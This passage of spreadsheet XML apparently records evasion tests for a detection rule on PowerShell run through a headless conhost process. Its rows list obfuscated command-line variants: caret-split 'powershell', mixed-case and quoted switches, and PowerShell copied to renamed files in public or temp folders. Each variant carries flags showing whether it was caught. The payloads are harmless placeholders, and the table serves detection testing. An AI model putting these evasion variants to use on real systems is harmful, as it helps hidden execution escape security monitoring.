          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E3440" s="44" t="inlineStr">
        <is>
          <t>conhost.exe --HeAdlesS "p^o^w^e^r^s^h^e^l^l -ExecutionPolicy Bypass -File C:\script.ps1"</t>
        </is>
      </c>
      <c r="F3440" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3440" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3440" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3440" s="43" t="n"/>
      <c r="J3440" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3440" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3441" ht="15.75" customHeight="1" s="42">
      <c r="A3441" s="44" t="inlineStr">
        <is>
          <t>t1564.003</t>
        </is>
      </c>
      <c r="B3441" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C3441" s="44" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D3441" s="44" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E3441" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Public\not_ps.exe &amp;&amp; conhost.exe --headless not_ps.exe -Command Get-Process</t>
        </is>
      </c>
      <c r="F3441" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3441" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3441" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3441" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J3441" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3441" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3442" ht="15.75" customHeight="1" s="42">
      <c r="A3442" s="44" t="inlineStr">
        <is>
          <t>t1564.003</t>
        </is>
      </c>
      <c r="B3442" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C3442" s="44" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D3442" s="44" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E3442" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Public\not_ps.exe &amp;&amp; conhost.exe --heADLEsS not_ps.exe -CommaND Get-Process</t>
        </is>
      </c>
      <c r="F3442" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3442" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3442" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3442" s="44" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J3442" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3442" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3443" ht="15.75" customHeight="1" s="42">
      <c r="A3443" s="44" t="inlineStr">
        <is>
          <t>t1564.003</t>
        </is>
      </c>
      <c r="B3443" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C3443" s="44" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D3443" s="44" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E3443" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Public\not_ps.exe &amp;&amp; conhost.exe --headLeSs not_ps.exe -COMMAnd Get-Process</t>
        </is>
      </c>
      <c r="F3443" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3443" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3443" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3443" s="44" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J3443" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3443" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3444" ht="15.75" customHeight="1" s="42">
      <c r="A3444" s="44" t="inlineStr">
        <is>
          <t>t1564.003</t>
        </is>
      </c>
      <c r="B3444" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C3444" s="44" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D3444" s="44" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E3444" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Public\not_ps.exe &amp;&amp; conhost.exe --headLESs not_ps.exe -Command Get-Process</t>
        </is>
      </c>
      <c r="F3444" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3444" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3444" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3444" s="44" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J3444" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3444" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3445" ht="15.75" customHeight="1" s="42">
      <c r="A3445" s="44" t="inlineStr">
        <is>
          <t>t1564.003</t>
        </is>
      </c>
      <c r="B3445" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C3445" s="44" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D3445" s="44" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E3445" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Public\not_ps.exe &amp;&amp; conhost.exe /"-headless" not_ps.exe -COmMANd Get-Process</t>
        </is>
      </c>
      <c r="F3445" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3445" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3445" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3445" s="44" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J3445" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3445" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3446" ht="15.75" customHeight="1" s="42">
      <c r="A3446" s="44" t="inlineStr">
        <is>
          <t>t1564.003</t>
        </is>
      </c>
      <c r="B3446" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C3446" s="44" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D3446" s="44" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E3446" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Public\not_ps.exe &amp;&amp; conhost.exe --headless not_ps.exe -cOmmaNd Get-Process</t>
        </is>
      </c>
      <c r="F3446" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3446" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3446" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3446" s="44" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J3446" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3446" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3447" ht="15.75" customHeight="1" s="42">
      <c r="A3447" s="44" t="inlineStr">
        <is>
          <t>t1564.003</t>
        </is>
      </c>
      <c r="B3447" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C3447" s="44" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D3447" s="44" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E3447" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Public\not_ps.exe &amp;&amp; conhost.exe -"-headless" not_ps.exe -Command Get-Process</t>
        </is>
      </c>
      <c r="F3447" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3447" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3447" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3447" s="44" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J3447" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3447" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3448" ht="15.75" customHeight="1" s="42">
      <c r="A3448" s="44" t="inlineStr">
        <is>
          <t>t1564.003</t>
        </is>
      </c>
      <c r="B3448" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C3448" s="44" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D3448" s="44" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E3448" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Public\not_ps.exe &amp;&amp; conhost.exe -"-headless" not_ps.exe -comManD Get-Process</t>
        </is>
      </c>
      <c r="F3448" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3448" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3448" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3448" s="44" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J3448" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3448" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3449" ht="15.75" customHeight="1" s="42">
      <c r="A3449" s="44" t="inlineStr">
        <is>
          <t>t1564.003</t>
        </is>
      </c>
      <c r="B3449" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C3449" s="44" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D3449" s="44" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E3449" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Public\not_ps.exe &amp;&amp; conhost.exe --headless not_ps.exe -cOmMaND Get-Process</t>
        </is>
      </c>
      <c r="F3449" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3449" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3449" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3449" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J3449" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3449" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3450" ht="15.75" customHeight="1" s="42">
      <c r="A3450" s="44" t="inlineStr">
        <is>
          <t>t1564.003</t>
        </is>
      </c>
      <c r="B3450" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C3450" s="44" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D3450" s="44" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E3450" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Public\not_ps.exe &amp;&amp; conhost.exe --headless not_ps.exe -"Command" Get-Process</t>
        </is>
      </c>
      <c r="F3450" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3450" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3450" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3450" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J3450" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3450" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3451" ht="15.75" customHeight="1" s="42">
      <c r="A3451" s="44" t="inlineStr">
        <is>
          <t>t1564.003</t>
        </is>
      </c>
      <c r="B3451" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C3451" s="44" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D3451" s="44" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E3451" s="44" t="inlineStr">
        <is>
          <t>conhost.exe --headless pwsh.exe -Command "Write-Host 'Simulated Bypass'"</t>
        </is>
      </c>
      <c r="F3451" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3451" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3451" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3451" s="44" t="n"/>
      <c r="J3451" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3451" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3452" ht="15.75" customHeight="1" s="42">
      <c r="A3452" s="44" t="inlineStr">
        <is>
          <t>t1564.003</t>
        </is>
      </c>
      <c r="B3452" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C3452" s="44" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D3452" s="44" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E3452" s="44" t="inlineStr">
        <is>
          <t>conhost.exe /"-headless" pwsh.exe -COmMANd "Write-Host 'Simulated Bypass'"</t>
        </is>
      </c>
      <c r="F3452" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3452" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3452" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3452" s="44" t="n"/>
      <c r="J3452" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3452" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3453" ht="15.75" customHeight="1" s="42">
      <c r="A3453" s="44" t="inlineStr">
        <is>
          <t>t1564.003</t>
        </is>
      </c>
      <c r="B3453" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C3453" s="44" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D3453" s="44" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E3453" s="44" t="inlineStr">
        <is>
          <t>conhost.exe --HeAdleSS pwsh.exe -Command "Write-Host 'Simulated Bypass'"</t>
        </is>
      </c>
      <c r="F3453" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3453" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3453" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3453" s="44" t="n"/>
      <c r="J3453" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3453" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3454" ht="15.75" customHeight="1" s="42">
      <c r="A3454" s="44" t="inlineStr">
        <is>
          <t>t1564.003</t>
        </is>
      </c>
      <c r="B3454" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C3454" s="44" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D3454" s="44" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E3454" s="44" t="inlineStr">
        <is>
          <t>conhost.exe --HeAdLEss pwsh.exe -Command "Write-Host 'Simulated Bypass'"</t>
        </is>
      </c>
      <c r="F3454" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3454" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3454" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3454" s="44" t="n"/>
      <c r="J3454" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3454" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3455" ht="15.75" customHeight="1" s="42">
      <c r="A3455" s="43" t="inlineStr">
        <is>
          <t>t1564.003</t>
        </is>
      </c>
      <c r="B3455" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C3455" s="43" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D3455" s="43" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E3455" s="43" t="inlineStr">
        <is>
          <t>conhost.exe -"-headless" pwsh.exe -"Command" "Write-Host 'Simulated Bypass'"</t>
        </is>
      </c>
      <c r="F3455" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3455" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3455" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3455" s="43" t="n"/>
      <c r="J3455" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K3455" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3456" ht="15.75" customHeight="1" s="42">
      <c r="A3456" s="44" t="inlineStr">
        <is>
          <t>t1564.003</t>
        </is>
      </c>
      <c r="B3456" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C3456" s="44" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D3456" s="44" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E3456" s="44" t="inlineStr">
        <is>
          <t>conhost.exe -"-headless" pwsh.exe -Command "Write-Host 'Simulated Bypass'"</t>
        </is>
      </c>
      <c r="F3456" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3456" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3456" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3456" s="43" t="n"/>
      <c r="J3456" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3456" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3457" ht="15.75" customHeight="1" s="42">
      <c r="A3457" s="44" t="inlineStr">
        <is>
          <t>t1564.003</t>
        </is>
      </c>
      <c r="B3457" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C3457" s="44" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D3457" s="44" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E3457" s="44" t="inlineStr">
        <is>
          <t>conhost.exe --headless pwsh.exe /"Command" "Write-Host 'Simulated Bypass'"</t>
        </is>
      </c>
      <c r="F3457" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3457" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3457" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3457" s="43" t="n"/>
      <c r="J3457" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3457" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3458" ht="15.75" customHeight="1" s="42">
      <c r="A3458" s="44" t="inlineStr">
        <is>
          <t>t1564.003</t>
        </is>
      </c>
      <c r="B3458" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C3458" s="44" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D3458" s="44" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E3458" s="44" t="inlineStr">
        <is>
          <t>conhost.exe --HeAdlESs pwsh.exe -cOmMand "Write-Host 'Simulated Bypass'"</t>
        </is>
      </c>
      <c r="F3458" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3458" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3458" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3458" s="43" t="n"/>
      <c r="J3458" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3458" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3459" ht="15.75" customHeight="1" s="42">
      <c r="A3459" s="44" t="inlineStr">
        <is>
          <t>t1564.003</t>
        </is>
      </c>
      <c r="B3459" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C3459" s="44" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D3459" s="44" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E3459" s="44" t="inlineStr">
        <is>
          <t>conhost.exe --headless pwsh.exe -"Command" "Write-Host 'Simulated Bypass'"</t>
        </is>
      </c>
      <c r="F3459" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3459" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3459" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3459" s="43" t="n"/>
      <c r="J3459" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3459" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3460" ht="15.75" customHeight="1" s="42">
      <c r="A3460" s="44" t="inlineStr">
        <is>
          <t>t1564.003</t>
        </is>
      </c>
      <c r="B3460" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C3460" s="44" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D3460" s="44" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E3460" s="44" t="inlineStr">
        <is>
          <t>conhost.exe /"-headless" pwsh.exe -COmmAnd "Write-Host 'Simulated Bypass'"</t>
        </is>
      </c>
      <c r="F3460" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3460" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3460" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3460" s="44" t="n"/>
      <c r="J3460" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3460" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3461" ht="15.75" customHeight="1" s="42">
      <c r="A3461" s="44" t="inlineStr">
        <is>
          <t>t1564.003</t>
        </is>
      </c>
      <c r="B3461" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C3461" s="44" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D3461" s="44" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E3461" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Temp\sys.exe &amp;&amp; conhost.exe --headless C:\Temp\sys.exe -Command "Write-Host 'Simulated Bypass'"</t>
        </is>
      </c>
      <c r="F3461" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3461" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3461" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3461" s="44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3461" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3461" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3462" ht="15.75" customHeight="1" s="42">
      <c r="A3462" s="44" t="inlineStr">
        <is>
          <t>t1564.003</t>
        </is>
      </c>
      <c r="B3462" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C3462" s="44" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D3462" s="44" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E3462" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Temp\sys.exe &amp;&amp; conhost.exe -"-headless" C:\Temp\sys.exe -Command "Write-Host 'Simulated Bypass'"</t>
        </is>
      </c>
      <c r="F3462" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3462" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3462" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3462" s="44" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J3462" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3462" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3463" ht="15.75" customHeight="1" s="42">
      <c r="A3463" s="44" t="inlineStr">
        <is>
          <t>t1564.003</t>
        </is>
      </c>
      <c r="B3463" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C3463" s="44" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D3463" s="44" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E3463" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Temp\sys.exe &amp;&amp; conhost.exe --hEADlEsS C:\Temp\sys.exe -Command "Write-Host 'Simulated Bypass'"</t>
        </is>
      </c>
      <c r="F3463" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3463" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3463" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3463" s="44" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J3463" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3463" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3464" ht="15.75" customHeight="1" s="42">
      <c r="A3464" s="44" t="inlineStr">
        <is>
          <t>t1564.003</t>
        </is>
      </c>
      <c r="B3464" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C3464" s="44" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D3464" s="44" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E3464" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Temp\sys.exe &amp;&amp; conhost.exe /"-headless" C:\Temp\sys.exe /"Command" "Write-Host 'Simulated Bypass'"</t>
        </is>
      </c>
      <c r="F3464" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3464" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3464" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3464" s="44" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J3464" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3464" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3465" ht="15.75" customHeight="1" s="42">
      <c r="A3465" s="44" t="inlineStr">
        <is>
          <t>t1564.003</t>
        </is>
      </c>
      <c r="B3465" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
